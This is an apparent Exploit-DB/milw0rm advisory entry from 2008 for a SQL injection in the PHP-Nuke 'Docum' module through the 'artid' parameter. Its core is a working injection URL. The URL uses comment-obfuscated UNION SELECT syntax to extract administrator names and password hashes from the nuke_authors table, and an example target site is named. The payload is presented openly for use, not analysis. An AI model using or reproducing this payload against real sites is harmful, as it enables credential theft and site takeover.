PHP-Nuke Module Docum - 'artid' SQL Injection

EDB-ID:

5161


Author:

DamaR

Type:

webapps


Platform:

PHP

Date:

2008-02-20


#########################################################################

           php-nuke modules Docum remote sql inj
#########################################################################

Found:DamaR

By.Damar@Hotmail.Com

Hack Bitti ama Dönmek Yakın  Since 2000
-------------------------------------------------------------------------------


/modules.php?name=Docum&op=viewarticle&artid=-1%2F%2A%2A%2Funion%2F%2A%2A%2Fselect%20%20/**/0,1,aid,pwd,4/**/from/**/nuke_authors/*where%20admin%20-2

#########################################################################
Example: http://www.xxx.com.ar/mt/


#########################################################################

# milw0rm.com [2008-02-20]